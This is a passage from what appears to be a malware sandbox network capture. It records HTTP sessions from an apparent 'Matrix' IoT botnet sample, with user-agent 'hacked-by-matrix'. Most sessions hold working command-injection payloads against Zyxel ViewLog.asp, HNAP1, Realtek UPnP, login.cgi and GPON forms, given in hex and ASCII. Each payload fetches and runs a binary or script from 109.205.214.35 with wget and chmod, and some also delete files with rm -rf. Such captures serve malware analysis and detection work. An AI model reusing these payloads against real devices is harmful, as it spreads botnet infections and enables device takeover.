                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                                                        Mar 21, 2024 05:23:00.373481989 CET504INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Thu, 21 Mar 2024 04:22:58 GMT
                                                        Connection: close
                                                        Content-Length: 315
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        787192.168.2.1339066206.233.173.13280
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:57.313745022 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:58.860240936 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        788192.168.2.1333552169.48.96.24480
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:57.336497068 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:57.489216089 CET331INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:22:57 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Vary: Accept-Encoding
                                                        Content-Encoding: gzip
                                                        Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
                                                        Mar 21, 2024 05:22:57.489268064 CET286INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:22:57 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        789192.168.2.1334034100.20.220.2528081
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:58.060750961 CET763OUTPOST /HNAP1/ HTTP/1.0
                                                        Content-Type: text/xml; charset="utf-8"
                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://109.205.214.35/mips && chmod +x mips;./mips hnap`
                                                        Content-Length: 640
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                                                        Mar 21, 2024 05:22:59.091253996 CET763OUTPOST /HNAP1/ HTTP/1.0
                                                        Content-Type: text/xml; charset="utf-8"
                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://109.205.214.35/mips && chmod +x mips;./mips hnap`
                                                        Content-Length: 640
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                                                        Mar 21, 2024 05:23:00.268239021 CET763OUTPOST /HNAP1/ HTTP/1.0
                                                        Content-Type: text/xml; charset="utf-8"
                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://109.205.214.35/mips && chmod +x mips;./mips hnap`
                                                        Content-Length: 640
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                                                        Mar 21, 2024 05:23:00.448390961 CET153INHTTP/1.0 404 Not Found
                                                        Content-Type: text/plain
                                                        Date: Thu, 21 Mar 2024 04:23:00 GMT
                                                        Connection: close
                                                        Data Raw: 4e 6f 20 6c 69 73 74 65 6e 65 72 20 66 6f 72 20 65 6e 64 70 6f 69 6e 74 3a 20 2f 48 4e 41 50 31 2f
                                                        Data Ascii: No listener for endpoint: /HNAP1/


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        790192.168.2.1339548172.65.42.14652869
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:58.826101065 CET987OUTPOST /picdesc.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        791192.168.2.135717623.57.46.9680
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.099467993 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:59.430610895 CET430INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 208
                                                        Expires: Thu, 21 Mar 2024 04:22:59 GMT
                                                        Date: Thu, 21 Mar 2024 04:22:59 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 37 34 30 31 63 30 34 35 26 23 34 36 3b 31 37 31 30 39 39 34 39 37 39 26 23 34 36 3b 34 39 35 66 64 37 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;7401c045&#46;1710994979&#46;495fd78</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        792192.168.2.13605625.65.235.21443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.656675100 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
